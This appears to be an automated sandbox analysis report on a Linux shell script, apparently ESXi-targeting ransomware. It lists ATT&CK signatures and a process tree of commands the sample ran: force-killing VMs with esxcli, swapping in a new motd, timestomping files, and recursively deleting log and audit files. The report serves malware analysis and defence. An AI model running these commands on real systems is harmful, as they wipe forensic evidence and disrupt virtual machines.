78276bd481a04c29109fbbd8313701e5b814165fa4b48515ec4489ccfda93107

Resubmissions

15-03-2024 16:07

240315-tkykeacf7z 1

25-02-2024 14:29

240225-rtjrhaee9z 10

Analysis

max time kernel
3s
max time network
1678s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240221-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
25-02-2024 14:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

script_malware/aa5a487db37ce176e17c7abbb2b1d460ba926344e46737f2f64b65bf5a4a3e58.sh
Size

4KB
MD5

34de9725e232ba82275bb0dcf9282e16
SHA1

b17403e7dcb992ba8d2b56dd843406264d3910e5
SHA256

aa5a487db37ce176e17c7abbb2b1d460ba926344e46737f2f64b65bf5a4a3e58
SHA512

1e63fe08153e6b3c1b3593fcc070d297a1d0e67ffc3b7f3fc58b71b4b39487f1fe738b863ea5e23c21159b248bc2149a69009ee5372ff17d386effc4f2111fd7

Score

7^/10

evasion

Malware Config

Signatures

Deletes Audit logs 1 TTPs 1 IoCs

Deletes logs related to the Linux Audit framework.

evasion

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/audit/audit.log	rm

Deletes log files 1 TTPs 11 IoCs

Deletes log files on the system.

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/alternatives.log	rm
File deleted	/var/log/kern.log	rm
File deleted	/var/log/gpu-manager.log	rm
File deleted	/var/log/ubuntu-advantage.log	rm
File deleted	/var/log/apt/history.log	rm
File deleted	/var/log/apt/term.log	rm
File deleted	/var/log/unattended-upgrades/unattended-upgrades-shutdown.log	rm
File deleted	/var/log/Xorg.0.log	rm
File deleted	/var/log/auth.log	rm
File deleted	/var/log/fontconfig.log	rm
File deleted	/var/log/dpkg.log	rm

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 17 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/vulnerabilities	find
File opened for reading	/sys/devices/system/cpu/cpu0/topology	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1	find
File opened for reading	/sys/devices/system/cpu/cpuidle	find
File opened for reading	/sys/devices/system/cpu/smt	find
File opened for reading	/sys/devices/system/cpu/cpu0	find
File opened for reading	/sys/devices/system/cpu/cpu0/hotplug	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3	find
File opened for reading	/sys/devices/system/cpu/cpufreq	find
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/hotplug	find
File opened for reading	/sys/devices/system/cpu/power	find
File opened for reading	/sys/devices/system/cpu/cpu0/power	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache	find

Reads hardware information 1 TTPs 1 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/power	find

Reads network interface configuration 2 TTPs 12 IoCs

Fetches information about one or more active network interfaces.

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/sys/devices/virtual/net/lo/queues/tx-0/byte_queue_limits	find
File opened for reading	/sys/devices/virtual/net/lo/queues/rx-0	find
File opened for reading	/sys/devices/pci0000:00/0000:00:03.0/net/ens3/queues/tx-0/byte_queue_limits	find
File opened for reading	/sys/devices/virtual/net/lo/statistics	find
File opened for reading	/sys/devices/virtual/net/lo/queues	find
File opened for reading	/sys/devices/virtual/net/lo/queues/tx-0	find
File opened for reading	/sys/devices/pci0000:00/0000:00:03.0/net/ens3/queues/rx-0	find
File opened for reading	/sys/devices/virtual/net/lo/power	find
File opened for reading	/sys/devices/pci0000:00/0000:00:03.0/net/ens3/statistics	find
File opened for reading	/sys/devices/pci0000:00/0000:00:03.0/net/ens3/power	find
File opened for reading	/sys/devices/pci0000:00/0000:00:03.0/net/ens3/queues	find
File opened for reading	/sys/devices/pci0000:00/0000:00:03.0/net/ens3/queues/tx-0	find

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/kernel/slab/skbuff_head_cache/cgroup/skbuff_head_cache(937:gsd-a11y-settings.service)	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_munlockall	find
File opened for reading	/sys/kernel/tracing/events/ext4/ext4_journalled_invalidatepage	find
File opened for reading	/sys/kernel/tracing/events/tlb	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_exit_ustat	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_exit_readv	find
File opened for reading	/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(537:snapd.service)	find
File opened for reading	/sys/kernel/slab/:A-0000080/cgroup/task_delay_info(1021:gsd-wacom.service)	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_exit_open_tree	find
File opened for reading	/sys/kernel/slab/:A-0000080/cgroup/task_delay_info(641:gdm.service)	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_vmsplice	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_mkdir	find
File opened for reading	/sys/kernel/debug/tracing/events/ext4/ext4_mballoc_prealloc	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_sched_setparam	find
File opened for reading	/sys/kernel/slab/sock_inode_cache/cgroup/sock_inode_cache(337:systemd-resolved.service)	find
File opened for reading	/sys/kernel/slab/:A-0000080/cgroup/task_delay_info(417:avahi-daemon.service)	find
File opened for reading	/sys/kernel/slab/kmalloc-192/cgroup/kmalloc-192(773:at-spi-dbus-bus.service)	find
File opened for reading	/sys/kernel/slab/ext4_inode_cache/cgroup/ext4_inode_cache(569:wpa_supplicant.service)	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_copy_file_range	find
File opened for reading	/sys/kernel/slab/:a-0000104/cgroup/buffer_head(553:systemd-logind.service)	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_timerfd_create	find
File opened for reading	/sys/kernel/debug/opp	find
File opened for reading	/sys/devices/system/clockevents/power	find
File opened for reading	/sys/fs/cgroup/unified/system.slice/upower.service	find
File opened for reading	/sys/module/pata_acpi/drivers	find
File opened for reading	/sys/kernel/debug/tracing/events/vmscan/mm_vmscan_inactive_list_is_low	find
File opened for reading	/sys/fs/cgroup/systemd/user.slice/user-0.slice/[email protected]/xdg-permission-store.service	find
File opened for reading	/sys/fs/cgroup/memory/user.slice/user-0.slice/[email protected]/gvfs-mtp-volume-monitor.service	find
File opened for reading	/sys/kernel/tracing/events/ras/memory_failure_event	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_enter_getrandom	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_enter_add_key	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_enter_init_module	find
File opened for reading	/sys/kernel/slab/sighand_cache/cgroup/sighand_cache(1093:apt-daily.service)	find
File opened for reading	/sys/kernel/debug/tracing/events/intel_iommu/map_sg	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_exit_utime	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_pkey_free	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_getuid	find
File opened for reading	/sys/devices/pci0000:00/0000:00:05.0/power	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_enter_signalfd4	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_enter_capset	find
File opened for reading	/sys/kernel/debug/tracing/events/compaction/mm_compaction_defer_reset	find
File opened for reading	/sys/devices/virtual/block/loop0/queue	find
File opened for reading	/sys/fs/cgroup/devices/system.slice/boot-efi.mount	find
File opened for reading	/sys/fs/cgroup/unified/system.slice/dev-mqueue.mount	find
File opened for reading	/sys/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A03:00/device:1f/power	find
File opened for reading	/sys/module/efi_pstore	find
File opened for reading	/sys/kernel/slab/kmalloc-2k/cgroup/kmalloc-2k(1067:gnome-terminal-server.service)	find
File opened for reading	/sys/kernel/slab/:A-0001152/cgroup/signal_cache(593:cups-browsed.service)	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_setdomainname	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_kill	find
File opened for reading	/sys/kernel/debug/bdi/7:6	find
File opened for reading	/sys/devices/virtual/block/loop5/queue	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_exit_getdents64	find
File opened for reading	/sys/kernel/slab/kmalloc-64/cgroup/kmalloc-64(377:acpid.service)	find
File opened for reading	/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(973:gsd-power.service)	find
File opened for reading	/sys/kernel/slab/inode_cache/cgroup/inode_cache(249:proc-sys-fs-binfmt_misc.mount)	find
File opened for reading	/sys/kernel/tracing/events/net/netif_rx	find
File opened for reading	/sys/kernel/debug/tracing/events/sched/sched_waking	find
File opened for reading	/sys/kernel/debug/tracing/events/xen/xen_mc_entry	find
File opened for reading	/sys/class/backlight	find
File opened for reading	/sys/devices/virtual/tty/tty27/power	find
File opened for reading	/sys/kernel/slab/:A-0000040/cgroup/pde_opener(561:udisks2.service)	find
File opened for reading	/sys/kernel/slab/sighand_cache/cgroup/sighand_cache(761:session-1.scope)	find
File opened for reading	/sys/kernel/tracing/events/xhci-hcd/xhci_stop_device	find

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/4/ns	find
File opened for reading	/proc/73/task/73	find
File opened for reading	/proc/1117/task/1132/net/netfilter	find
File opened for reading	/proc/1432/fdinfo	find
File opened for reading	/proc/78/fdinfo	find
File opened for reading	/proc/163/task/163	find
File opened for reading	/proc/167/task/167/net	find
File opened for reading	/proc/666/task/795/net	find
File opened for reading	/proc/912/task/917/ns	find
File opened for reading	/proc/952/task/969/attr	find
File opened for reading	/proc/1136/task/1136/attr/smack	find
File opened for reading	/proc/70/task/70/net/dev_snmp6	find
File opened for reading	/proc/79/map_files	find
File opened for reading	/proc/449/task	find
File opened for reading	/proc/497/fd	find
File opened for reading	/proc/897/net	find
File opened for reading	/proc/952/task/969	find
File opened for reading	/proc/168/stat	ps
File opened for reading	/proc/18/task/18	find
File opened for reading	/proc/903/net/stat	find
File opened for reading	/proc/1110/task/1152/fd	find
File opened for reading	/proc/1290/task/1293/attr/smack	find
File opened for reading	/proc/1431/task/1446/fd	find
File opened for reading	/proc/14/attr/apparmor	find
File opened for reading	/proc/84/task/84/attr	find
File opened for reading	/proc/173/task/173/net/netfilter	find
File opened for reading	/proc/571/task/571/attr	find
File opened for reading	/proc/1076/task/1127/net/stat	find
File opened for reading	/proc/93/task/93	find
File opened for reading	/proc/169/task/169/attr/apparmor	find
File opened for reading	/proc/496/task/507/net/dev_snmp6	find
File opened for reading	/proc/807/task/808/net/dev_snmp6	find
File opened for reading	/proc/942/task/943/net	find
File opened for reading	/proc/958	find
File opened for reading	/proc/1053/task/1053/fd	find
File opened for reading	/proc/1428/task/1428/attr/apparmor	find
File opened for reading	/proc/sys/net/ipv4/conf/default	find
File opened for reading	/proc/82/net/dev_snmp6	find
File opened for reading	/proc/497/net/netfilter	find
File opened for reading	/proc/688/task/688/net/stat	find
File opened for reading	/proc/1087/task/1183/net/stat	find
File opened for reading	/proc/170/status	ps
File opened for reading	/proc/6/task/6/fd	find
File opened for reading	/proc/876/task/876/attr/apparmor	find
File opened for reading	/proc/876/task/894/net/netfilter	find
File opened for reading	/proc/1137/task/1139/attr	find
File opened for reading	/proc/1431/task/1535/net/dev_snmp6	find
File opened for reading	/proc/487/task/522/ns	find
File opened for reading	/proc/586/map_files	find
File opened for reading	/proc/965/map_files	find
File opened for reading	/proc/1110/net/netfilter	find
File opened for reading	/proc/1196/attr	find
File opened for reading	/proc/1463/task/1532/fdinfo	find
File opened for reading	/proc/613/task/613/fdinfo	find
File opened for reading	/proc/995/task/999/attr/smack	find
File opened for reading	/proc/1077/task/1077/net/netfilter	find
File opened for reading	/proc/71/attr/apparmor	find
File opened for reading	/proc/92/task/92/fdinfo	find
File opened for reading	/proc/171/task/171/fdinfo	find
File opened for reading	/proc/1027/task/1029	find
File opened for reading	/proc/91/attr/apparmor	find
File opened for reading	/proc/93/ns	find
File opened for reading	/proc/692/task/787/fdinfo	find
File opened for reading	/proc/912/task/917/net/netfilter	find

/tmp/script_malware/aa5a487db37ce176e17c7abbb2b1d460ba926344e46737f2f64b65bf5a4a3e58.sh
/tmp/script_malware/aa5a487db37ce176e17c7abbb2b1d460ba926344e46737f2f64b65bf5a4a3e58.sh
1⤵
PID:1482
- /usr/bin/chmod
  chmod +x /tmp/164f8295_linux.elf
  2⤵
  PID:1483
- /usr/bin/awk
  awk -F "," "NR > 1 {system(\"esxcli vm process kill --type=force --world-id=\" \$1)}"
  2⤵
  PID:1487
- /usr/bin/find
  find /usr/lib/vmware -type f -name index.html
  2⤵
  PID:1505
- /usr/bin/mv
  mv /etc/motd /etc/motd.backup
  2⤵
  PID:1506
- /usr/bin/cp
  cp /tmp/motd /etc/motd
  2⤵
  PID:1507
- /usr/bin/touch
  touch -r /etc/vmware/rhttpproxy/config.xml /etc/vmware/rhttpproxy/endpoints.conf
  2⤵
  PID:1512
- /usr/bin/touch
  touch -r /etc/vmware/rhttpproxy/config.xml /bin/hostd-probe.sh
  2⤵
  PID:1513
- /usr/bin/touch
  touch -r /etc/vmware/rhttpproxy/config.xml /etc/rc.local.d/local.sh
  2⤵
  PID:1514
- /usr/bin/find
  find / -name "*.log" -exec rm -rf "{}" ";"
  2⤵
  - Reads CPU attributes
  - Reads hardware information
  - Reads network interface configuration
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:1515
- - /usr/local/sbin/rm
    rm -rf /var/lib/gdm3/.local/share/gvfs-metadata/root-e9de34b2.log
    3⤵
    PID:1516
- - /usr/local/bin/rm
    rm -rf /var/lib/gdm3/.local/share/gvfs-metadata/root-e9de34b2.log
    3⤵
    PID:1516
- - /usr/sbin/rm
    rm -rf /var/lib/gdm3/.local/share/gvfs-metadata/root-e9de34b2.log
    3⤵
    PID:1516
- - /usr/bin/rm
    rm -rf /var/lib/gdm3/.local/share/gvfs-metadata/root-e9de34b2.log
    3⤵
    PID:1516
- - /usr/local/sbin/rm
    rm -rf /var/log/auth.log
    3⤵
    PID:1520
- - /usr/local/bin/rm
    rm -rf /var/log/auth.log
    3⤵
    PID:1520
- - /usr/sbin/rm
    rm -rf /var/log/auth.log
    3⤵
    PID:1520
- - /usr/bin/rm
    rm -rf /var/log/auth.log
    3⤵
    - Deletes log files
    PID:1520
- - /usr/local/sbin/rm
    rm -rf /var/log/kern.log
    3⤵
    PID:1521
- - /usr/local/bin/rm
    rm -rf /var/log/kern.log
    3⤵
    PID:1521
- - /usr/sbin/rm
    rm -rf /var/log/kern.log
    3⤵
    PID:1521
- - /usr/bin/rm
    rm -rf /var/log/kern.log
    3⤵
    - Deletes log files
    PID:1521
- - /usr/local/sbin/rm
    rm -rf /var/log/fontconfig.log
    3⤵
    PID:1522
- - /usr/local/bin/rm
    rm -rf /var/log/fontconfig.log
    3⤵
    PID:1522
- - /usr/sbin/rm
    rm -rf /var/log/fontconfig.log
    3⤵
    PID:1522
- - /usr/bin/rm
    rm -rf /var/log/fontconfig.log
    3⤵
    - Deletes log files
    PID:1522
- - /usr/local/sbin/rm
    rm -rf /var/log/gpu-manager.log
    3⤵
    PID:1523
- - /usr/local/bin/rm
    rm -rf /var/log/gpu-manager.log
    3⤵
    PID:1523
- - /usr/sbin/rm
    rm -rf /var/log/gpu-manager.log
    3⤵
    PID:1523
- - /usr/bin/rm
    rm -rf /var/log/gpu-manager.log
    3⤵
    - Deletes log files
    PID:1523
- - /usr/local/sbin/rm
    rm -rf /var/log/audit/audit.log
    3⤵
    PID:1524
- - /usr/local/bin/rm
    rm -rf /var/log/audit/audit.log
    3⤵
    PID:1524
- - /usr/sbin/rm
    rm -rf /var/log/audit/audit.log
    3⤵
    PID:1524
- - /usr/bin/rm
    rm -rf /var/log/audit/audit.log
    3⤵
    - Deletes Audit logs
    PID:1524
- - /usr/local/sbin/rm
    rm -rf /var/log/dpkg.log
    3⤵
    PID:1525
- - /usr/local/bin/rm
    rm -rf /var/log/dpkg.log
    3⤵
    PID:1525
- - /usr/sbin/rm
    rm -rf /var/log/dpkg.log
    3⤵
    PID:1525
- - /usr/bin/rm
    rm -rf /var/log/dpkg.log
    3⤵
    - Deletes log files
    PID:1525
- - /usr/local/sbin/rm
    rm -rf /var/log/ubuntu-advantage.log
    3⤵
    PID:1526
- - /usr/local/bin/rm
    rm -rf /var/log/ubuntu-advantage.log
    3⤵
    PID:1526
- - /usr/sbin/rm
    rm -rf /var/log/ubuntu-advantage.log
    3⤵
    PID:1526
- - /usr/bin/rm
    rm -rf /var/log/ubuntu-advantage.log
    3⤵
    - Deletes log files
    PID:1526
- - /usr/local/sbin/rm
    rm -rf /var/log/apt/history.log
    3⤵
    PID:1527
- - /usr/local/bin/rm
    rm -rf /var/log/apt/history.log
    3⤵
    PID:1527
- - /usr/sbin/rm
    rm -rf /var/log/apt/history.log
    3⤵
    PID:1527
- - /usr/bin/rm
    rm -rf /var/log/apt/history.log
    3⤵
    - Deletes log files
    PID:1527
- - /usr/local/sbin/rm
    rm -rf /var/log/apt/term.log
    3⤵
    PID:1528
- - /usr/local/bin/rm
    rm -rf /var/log/apt/term.log
    3⤵
    PID:1528
- - /usr/sbin/rm
    rm -rf /var/log/apt/term.log
    3⤵
    PID:1528
- - /usr/bin/rm
    rm -rf /var/log/apt/term.log
    3⤵
    - Deletes log files
    PID:1528
- - /usr/local/sbin/rm
    rm -rf /var/log/unattended-upgrades/unattended-upgrades-shutdown.log
    3⤵
    PID:1529
- - /usr/local/bin/rm
    rm -rf /var/log/unattended-upgrades/unattended-upgrades-shutdown.log
    3⤵
    PID:1529
- - /usr/sbin/rm
    rm -rf /var/log/unattended-upgrades/unattended-upgrades-shutdown.log
    3⤵
    PID:1529
- - /usr/bin/rm
    rm -rf /var/log/unattended-upgrades/unattended-upgrades-shutdown.log
    3⤵
    - Deletes log files
    PID:1529
- - /usr/local/sbin/rm
    rm -rf /var/log/alternatives.log
    3⤵
    PID:1530
- - /usr/local/bin/rm
    rm -rf /var/log/alternatives.log
    3⤵
    PID:1530
- - /usr/sbin/rm
    rm -rf /var/log/alternatives.log
    3⤵
    PID:1530
- - /usr/bin/rm
    rm -rf /var/log/alternatives.log
    3⤵
    - Deletes log files
    PID:1530
- - /usr/local/sbin/rm
    rm -rf /var/log/Xorg.0.log
    3⤵
    PID:1531
- - /usr/local/bin/rm
    rm -rf /var/log/Xorg.0.log
    3⤵
    PID:1531
- - /usr/sbin/rm
    rm -rf /var/log/Xorg.0.log
    3⤵
    PID:1531
- - /usr/bin/rm
    rm -rf /var/log/Xorg.0.log
    3⤵
    - Deletes log files
    PID:1531
- - /usr/local/sbin/rm
    rm -rf /root/.local/share/gvfs-metadata/trash:-d4ccb72f.log
    3⤵
    PID:1565
- - /usr/local/bin/rm
    rm -rf /root/.local/share/gvfs-metadata/trash:-d4ccb72f.log
    3⤵
    PID:1565
- - /usr/sbin/rm
    rm -rf /root/.local/share/gvfs-metadata/trash:-d4ccb72f.log
    3⤵
    PID:1565
- - /usr/bin/rm
    rm -rf /root/.local/share/gvfs-metadata/trash:-d4ccb72f.log
    3⤵
    PID:1565
- - /usr/local/sbin/rm
    rm -rf /root/.local/share/gvfs-metadata/home-70c1dbf4.log
    3⤵
    PID:1566
- - /usr/local/bin/rm
    rm -rf /root/.local/share/gvfs-metadata/home-70c1dbf4.log
    3⤵
    PID:1566
- - /usr/sbin/rm
    rm -rf /root/.local/share/gvfs-metadata/home-70c1dbf4.log
    3⤵
    PID:1566
- - /usr/bin/rm
    rm -rf /root/.local/share/gvfs-metadata/home-70c1dbf4.log
    3⤵
    PID:1566
- - /usr/local/sbin/rm
    rm -rf /root/.local/share/gvfs-metadata/root-cd51b59a.log
    3⤵
    PID:1568
- - /usr/local/bin/rm
    rm -rf /root/.local/share/gvfs-metadata/root-cd51b59a.log
    3⤵
    PID:1568
- - /usr/sbin/rm
    rm -rf /root/.local/share/gvfs-metadata/root-cd51b59a.log
    3⤵
    PID:1568
- - /usr/bin/rm
    rm -rf /root/.local/share/gvfs-metadata/root-cd51b59a.log
    3⤵
    PID:1568
- - /usr/local/sbin/rm
    rm -rf /run/initramfs/fsck.log
    3⤵
    PID:1570
- - /usr/local/bin/rm
    rm -rf /run/initramfs/fsck.log
    3⤵
    PID:1570
- - /usr/sbin/rm
    rm -rf /run/initramfs/fsck.log
    3⤵
    PID:1570
- - /usr/bin/rm
    rm -rf /run/initramfs/fsck.log
    3⤵
    PID:1570
- /usr/bin/find
  find /vmfs/volumes -type f -name "*.*~" -exec rm -rf "{}" ";"
  2⤵
  PID:1959
- /usr/bin/rm
  rm -f /tmp/164f8295_linux.elf /tmp/index.html /tmp/motd
  2⤵
  PID:1960
- /bin/sh
  /bin/sh /bin/auto-backup.sh
  2⤵
  PID:1961
- /usr/bin/rm
  rm -- /tmp/script_malware/aa5a487db37ce176e17c7abbb2b1d460ba926344e46737f2f64b65bf5a4a3e58.sh
  2⤵
  PID:1962
- /etc/init.d/SSH
  /etc/init.d/SSH start
  2⤵
  PID:1963

/usr/bin/grep
grep vmx
1⤵
PID:1490

/usr/bin/awk
awk "{print \$2}"
1⤵
PID:1491

/usr/bin/ps
ps
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:1489

/usr/bin/awk
awk "NR > 2 { print \$1 }"
1⤵
PID:1495

/usr/bin/awk
awk "-F " "{print \$2}"
1⤵
PID:1499

/usr/bin/grep
grep /vmfs/volumes/
1⤵
PID:1498

/usr/bin/wc
wc -l
1⤵
PID:1504

/usr/bin/grep
grep -v grep
1⤵
PID:1503

/usr/bin/grep
grep 164f8295_linux.elf
1⤵
PID:1502

/usr/bin/ps
ps
1⤵
- Reads CPU attributes
PID:1501

/usr/bin/wc
wc -l
1⤵
PID:1511

/usr/bin/grep
grep " 7."
1⤵
PID:1510

/bin/vmware
/bin/vmware -l
1⤵
PID:1509

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads